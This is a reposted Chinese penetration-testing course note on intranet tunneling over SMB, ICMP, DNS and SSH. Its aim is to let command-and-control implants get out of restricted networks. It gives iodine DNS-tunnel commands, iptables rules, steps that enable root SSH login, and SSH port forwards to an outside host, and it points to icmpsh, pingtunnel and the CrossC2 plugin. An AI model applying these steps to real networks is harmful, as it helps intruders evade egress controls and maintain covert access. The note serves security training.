0


第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

在这里插入图片描述

知识点

  1. #知识点:1、入站规则不出网上线方案
  2. 2、出站规则不出网上线方案
  3. 3、隧道技术-SMB&ICMP&DNS&SSH
  4. 4、控制上线-Linux&Mac&IOS&Android
  5. -连接方向:正向&反向(基础课程有讲过)
  6. -内网穿透:解决网络控制上线&网络通讯问题
  7. -隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
  8. -代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
  9. #系列点:1、判断什么时候用代理
  10. 2、判断什么时候用隧道
  11. 3、判断出网和不出网协议
  12. 4、如何使用代理建立节点并连接
  13. 5、如何使用隧道技术封装协议上线
  14. 6、判断哪些代理或隧道情况选择放弃

在这里插入图片描述
在这里插入图片描述

演示案例

  1. 1、隧道技术-SMB协议-判断&通讯&上线
  2. 2、隧道技术-ICMP协议-判断&通讯&上线
  3. 3、隧道技术-DNS协议-判断&通讯&上线
  4. 4、隧道技术-SSH协议-判断&通讯&上线
  5. 5、控制上线-插件-Linux&Mac&IOS&Android
  1. 1、判断出网协议
  2. 2、使用出网协议建立隧道
  3. #SMB隧道&通讯&上线
  4. 判断:445通讯
  5. 上线:借助通讯后绑定上线
  6. 通讯:直接SMB协议通讯即可
  7. #ICMP隧道&通讯&上线
  8. 判断:ping命令
  9. 上线:见前面课程
  10. 通讯:其他项目(icmpsh icmptunnel)
  11. https://github.com/esrrhs/spp
  12. https://github.com/bdamele/icmpsh
  13. https://github.com/esrrhs/pingtunnel
  14. #DNS隧道&通讯&上线
  15. 判断:nslookup dig1、上线环境:内网主机只出网DNS协议数据,解决上线
  16. -域名申请及配置
  17. -监听器创建及配置
  18. -后门绑定监听器及生成
  19. 2、通讯环境:
  20. 内网主机只出网DNS协议数据,解决通讯
  21. https://github.com/yarrick/iodine
  22. 判断出网:nslookup www.baidu.com
  23. -服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向
  24. iodined -f-c-P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
  25. 设置密码xiaodi并创建虚拟IP及绑定域名指向
  26. -客户端:连接密码xiaodi并绑定域名指向
  27. iodine -f-M200-P xiaodi ns1.xiaodi8.com
  28. -尝试通讯尝试连接:
  29. ssh root@192.168.0.2
  30. #SSH隧道&通讯
  31. 判断:ssh连接
  32. 1、上线:
  33. 由于CSSSH协议监听器配置,无法上线
  34. 2、通讯:
  35. 由于SSH协议存在于Linux系统,跳板机必须Linux
  36. iptables -F /* 清除所有规则 */
  37. iptables -A INPUT -p tcp --dport22-j ACCEPT /*允许包从22端口进入*/
  38. iptables -A OUTPUT -p tcp --sport22-m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
  39. iptables -A OUTPUT -p udp --dport53-j ACCEPT /* 域名解析端口,一般不开 */
  40. iptables -A INPUT -p udp --sport53-j ACCEPT /* 域名解析端口,一般不开 */
  41. iptables -A INPUT -s127.0.0.1 -d127.0.0.1 -j ACCEPT /*允许本机访问本机*/
  42. iptables -A OUTPUT -s127.0.0.1 -d127.0.0.1 -j ACCEPT
  43. iptables -A INPUT -p tcp -s0/0 --dport80-j ACCEPT /*允许所有IP访问80端口*/
  44. iptables -A OUTPUT -p tcp --sport80-m state --state ESTABLISHED -j ACCEPT
  45. iptables-save > /etc/sysconfig/iptables /*保存配置*/
  46. iptables -L /* 显示iptables列表 */
  47. 开启ssh协议登录:
  48. vi /etc/ssh/sshd_config
  49. PermitRootLogin yes
  50. PasswordAuthentication yes
  51. /etc/init.d/ssh start
  52. /etc/init.d/ssh restart
  53. 本地:出站封
  54. ssh-CfNg-L1122:192.168.1.15:8080 root@192.168.1.166
  55. curl http://127.0.0.1:1122
  56. 远程:入站封
  57. ssh-CfNg-R1234:192.168.1.15:8080 root@47.94.236.117
  58. curl http://127.0.0.1:1234
  59. #控制上线-插件-Linux&Mac&IOS&Android
  60. https://github.com/gloxec/CrossC2
  61. 面向Linux Mac IOS Android系统上线支持
  62. 1、插件使用
  63. 2、命令使用
  64. 使用参考:
  65. https://gloxec.github.io/CrossC2/zh_cn/
  66. 目前版本只支持反向的https和正向的tcp
  67. 1、下载对应版本加载器和CNA插件
  68. 2、上传加载器文件和本地加载CNA插件
  69. 3、修改CNA插件配置路径及上传Key文件
  70. 4、使用命令或插件绑定HTTPS监听器生成
标签: 安全 ssh linux

本文转载自: https://blog.csdn.net/qq_46081990/article/details/132095060
版权归原作者 Ch4ser 所有, 如有侵权,请联系我们删除。

“第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac”的评论:

还没有评论